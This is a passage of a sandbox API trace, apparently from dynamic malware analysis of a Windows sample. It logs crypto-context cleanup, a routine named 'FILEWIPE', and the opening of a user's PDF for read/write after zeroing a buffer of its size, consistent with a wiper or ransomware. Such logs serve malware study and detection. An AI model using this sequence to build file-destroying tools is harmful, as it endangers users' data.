lpMsg=0x87edf4) returned 0 [0172.375] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0172.375] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0172.375] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.375] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0172.375] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.375] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0172.375] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.375] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.375] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.375] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.375] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0172.375] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.375] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.375] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0172.375] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0172.375] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0172.376] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.376] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0172.376] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.376] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.376] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0172.376] FreeLibrary (hLibModule=0x74f20000) returned 1 [0172.376] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.376] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.376] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.376] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.386] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.387] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.387] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0172.387] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.388] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.388] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f79cf20, ftCreationTime.dwHighDateTime=0x1d5dc3c, ftLastAccessTime.dwLowDateTime=0x786873d0, ftLastAccessTime.dwHighDateTime=0x1d5dbe6, ftLastWriteTime.dwLowDateTime=0x786873d0, ftLastWriteTime.dwHighDateTime=0x1d5dbe6, nFileSizeHigh=0x0, nFileSizeLow=0xe8ff, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Lxb_fXCsV.pdf", cAlternateFileName="LXB_FX~1.PDF")) returned 0x90ae18 [0172.388] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0172.388] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.388] CharLowerBuffW (in: lpsz="byte[59647]", cchLength=0xb | out: lpsz="byte[59647]") returned 0xb [0172.389] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.389] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0172.390] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.390] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0172.390] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0172.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0172.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0172.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0172.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2768 [0172.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2768, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0172.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0172.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0172.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0172.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0172.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0172.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0172.391] FreeLibrary (hLibModule=0x75c90000) returned 1 [0172.391] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0172.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0172.391] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.391] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0172.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0172.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0172.391] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0172.391] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0172.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0172.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0172.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0172.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0172.391] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0172.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0172.392] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0172.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0172.405] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0172.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0172.405] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0172.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0172.405] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0172.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0172.405] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0172.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0172.405] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.405] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.406] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.406] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.406] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0172.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0172.406] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0172.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0172.406] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0172.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0172.406] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0172.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0172.406] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0172.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0172.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0172.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0172.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0172.407] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0172.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0172.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0172.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0172.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0172.407] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0172.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0172.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0172.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f58 [0172.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9b9f58, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0172.408] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\lxb_fxcsv.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0172.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0172.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0172.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0172.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0172.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0172.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0172.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0172.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0172.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0172.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0172.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0172.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0172.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0172.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0172.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0172.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0172.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6d910 | out: hHeap=0x8a0000) returned 1 [0172.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0172.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0172.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0172.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0172.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0172.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0172.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0172.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0172.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0172.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0172.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0172.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0172.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0172.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0172.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0172.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0172.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0172.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0172.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0172.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0172.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0172.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0172.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0172.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0172.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0172.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0172.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0172.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0172.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0172.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0172.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0172.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0172.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0172.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0172.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0172.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0172.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0172.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0172.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0172.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0172.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0172.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0172.411] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0172.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0172.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.411] HeapFree (in: 